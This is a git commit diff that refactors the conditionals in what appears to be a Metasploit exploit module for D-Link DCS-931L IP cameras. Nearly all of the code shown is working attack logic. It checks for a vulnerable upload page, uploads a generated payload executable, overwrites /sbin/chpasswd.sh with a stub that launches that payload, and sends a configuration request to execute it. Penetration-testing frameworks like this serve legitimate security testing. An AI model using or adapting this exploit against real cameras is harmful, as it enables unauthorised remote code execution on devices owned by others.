Use unless instead of if !

2016-01-05 13:05:01 -06:00 · 2016-01-05 13:05:01 -06:00 · 7259d2a65c
parent 7907c93047
commit 7259d2a65c
1 changed files with 28 additions and 14 deletions
--- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb
+++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb
@ -68,16 +68,21 @@ class Metasploit4 < Msf::Exploit::Remote
  def check
    res = send_request_cgi(
      'uri' => normalize_uri('uploadfile.htm'),
-      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']))
-    if !res
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']
+    ))
+
+    unless res
+      vprint_status("#{peer} - The connection timed out.")
      return Exploit::CheckCode::Unknown
-    elsif res && res.code && res.code == 404
+    end
+
+    if res.code && res.code == 404
      vprint_status("#{peer} - uploadfile.htm does not exist")
      return Exploit::CheckCode::Safe
-    elsif res && res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS-931L"/
+    elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/
      vprint_error("#{peer} - Authentication failed")
      return Exploit::CheckCode::Detected
-    elsif res && res.code && res.code == 200 && res.body && res.body =~ /Upload File/
+    elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
@ -88,11 +93,14 @@ class Metasploit4 < Msf::Exploit::Remote

    # upload payload
    res = upload(payload_path, generate_payload_exe)
-    if !res
+
+    unless res
      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
-    elsif res && res.code && res.code == 404
+    end
+
+    if res.code && res.code == 404
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
-    elsif res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
+    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
      print_good("#{peer} - Payload uploaded successfully")
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload")
@ -101,11 +109,14 @@ class Metasploit4 < Msf::Exploit::Remote

    # overwrite /sbin/chpasswd.sh with stub
    res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n")
-    if !res
+
+    unless res
      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
-    elsif res && res.code && res.code == 404
+    end
+
+    if res.code && res.code == 404
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist")
-    elsif res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
+    elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
      print_good("#{peer} - Stager uploaded successfully")
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
@ -121,11 +132,14 @@ class Metasploit4 < Msf::Exploit::Remote
        'ReplyErrorPage' => 'errradv.htm',
        'ConfigSystemAdmin' => 'Apply'
      }.to_a.shuffle])
-    if !res
+
+    unless res
      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
-    elsif res && res.code && res.code == 401
+    end
+
+    if res.code && res.code == 401
      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
-    elsif res && res.code && res.code == 200 && res.body
+    elsif res.code && res.code == 200 && res.body
      print_good("#{peer} - Payload executed successfully")
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed")